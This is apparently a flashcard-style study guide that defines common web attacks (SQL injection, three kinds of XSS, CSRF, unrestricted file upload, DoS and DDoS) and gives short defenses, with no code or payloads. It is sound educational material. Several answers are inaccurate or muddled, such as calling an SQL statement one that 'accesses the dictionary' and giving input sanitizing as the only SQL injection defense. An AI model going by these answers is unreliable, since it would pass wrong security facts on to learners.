Web & Application Attacks Study Guide

What is a database?

An electronic data storage system organized in tables made up of rows and columns.

Why are databases important to society?

They efficiently store, manage, and retrieve lots of information.

What is a web app?

Any application that runs in a web browser rather than as a standalone program.

What does SQL stand for?

Structured Query Language.

What is SQL used for?

To fetch data from a database.

What is a key characteristic of an SQL statement?

It is a long statement that accesses the dictionary.

Name some important SQL keywords.

SELECT, UNION, null, concat(), FROM.

What is an SQL injection attack?

A malicious code placed into an SQL statement that runs on your database, returning results to an unauthorized user.

How are SQL injection attacks typically accomplished?

By abusing user input fields.

How do we defend against SQL injection attacks?

By sanitizing inputs.

What is a cross-site scripting (XSS) attack?

Malicious JavaScript injected directly onto a site.

What are the three main languages that make up most websites?

HTML, CSS, and JavaScript.

What can a cross-site scripting attack accomplish?

It allows an attacker to steal user data, compromise accounts, or redirect users to malicious sites.

What is a session ID?

An identifier that stores information across multiple visits to a website.

What are the three kinds of cross-site scripting?

Reflected XSS, DOM XSS, and Stored XSS.

What characterizes reflected XSS?

It’s used in the immediate response and only your own computer

What characterizes DOM XSS?

It involves changing the URL and occurs on the client side

What characterizes stored XSS?

It is on the server side, stored in the database, and accessible to any site visitor.

How do we defend against cross-site scripting attacks?

By sanitizing inputs.

What is a cross-site request forgery (CSRF) attack?

It abuses a user’s authentication to get them to perform unwanted actions.

How is a CSRF attack typically launched?

By copying the website and creating a fake version of a form to send to the user.

What is an unrestricted file upload vulnerability?

A vulnerability where a website does not check the types of files being uploaded.

Where can files uploaded to a website end up?

In the directory.

How can we prevent unrestricted file upload vulnerabilities?

By only allowing a specific data type or file size to be uploaded.

What is a denial of service (DoS) attack?

An attack overwhelming a server with requests, preventing it from processing genuine requests.

What is the difference between a DoS attack and a DDoS attack?

A DoS attack floods a device from a single source, while a DDoS attack uses multiple sources.

How can you defend against a denial of service attack?

By blocking traffic from unsafe or malicious IP addresses.